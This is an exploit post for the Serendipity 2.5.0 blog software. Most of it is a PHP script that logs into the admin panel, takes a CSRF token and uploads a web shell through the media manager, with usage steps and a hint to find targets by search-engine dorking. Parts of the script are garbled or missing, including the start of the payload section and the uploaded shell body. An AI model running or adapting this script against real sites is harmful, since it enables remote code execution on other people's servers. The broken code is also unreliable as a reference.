============================================================================================================================================= | # Title : Serendipity 2.5.0 PHP COde Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://www.s9y.org/latest | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Serendipity 2.5.0 - Remote Command Execution Exploit in PHP (Related : https://packetstorm.news/files/id/178890/ Related CVE numbers: ) . [+] save code as poc.php. [+] Usage: php script.php [+] PayLoad : "admin", "serendipity[user]" => $username, "serendipity[pass]" => $password, "submit" => "Login", "serendipity[token]" => $token ]; $headers = [ "Content-Type: application/x-www-form-urlencoded", "Referer: " . $base_url . "/serendipity_admin.php" ]; curl_setopt($session, CURLOPT_URL, $base_url . "/serendipity_admin.php"); curl_setopt($session, CURLOPT_POST, true); curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($data)); curl_setopt($session, CURLOPT_HTTPHEADER, $headers); $response = curl_exec($session); if (strpos($response, "Add media") !== false) { echo "Login Successful!\n"; sleep(2); return $session; } else { echo "Login Failed!\n"; return null; } } function upload_file($session, $base_url, $filename, $token) { echo "Shell Preparing...\n"; sleep(2); $boundary = "---------------------------395233558031804950903737832368"; $headers = [ "Content-Type: multipart/form-data; boundary=" . $boundary, "Referer: " . $base_url . "/serendipity_admin.php?serendipity[adminModule]=media" ]; $payload = "--$boundary\r\n" . "Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n" . "$token\r\n" . "--$boundary\r\n" . "Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n" . "admin\r\n" . "--$boundary\r\n" . "Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n" . "media\r\n" . "--$boundary\r\n" . "Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n" . "add\r\n" . "--$boundary\r\n" . "Content-Disposition: form-data; name=\"serendipity[userfile][1]\"; filename=\"$filename\"\r\n" . "Content-Type: text/html\r\n\r\n" . "\n\n
\">\n" . "\n\n" . "
\n
\n\n
\n\n\r\n" . "--$boundary--\r\n"; curl_setopt($session, CURLOPT_URL, $base_url . "/serendipity_admin.php?serendipity[adminModule]=media"); curl_setopt($session, CURLOPT_POST, true); curl_setopt($session, CURLOPT_HTTPHEADER, $headers); curl_setopt($session, CURLOPT_POSTFIELDS, $payload); $response = curl_exec($session); if (strpos($response, "File $filename successfully uploaded as") !== false) { echo "Your shell is ready: " . $base_url . "/uploads/$filename\n"; } else { echo "Exploit Failed!\n"; } } function main($base_url, $username, $password) { $filename = generate_filename(); $session = login($base_url, $username, $password); if ($session) { $token = get_csrf_token(curl_exec($session)); upload_file($session, $base_url, $filename, $token); } } if ($argc != 4) { echo "Usage: php script.php \n"; } else { main($argv[1], $argv[2], $argv[3]); } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================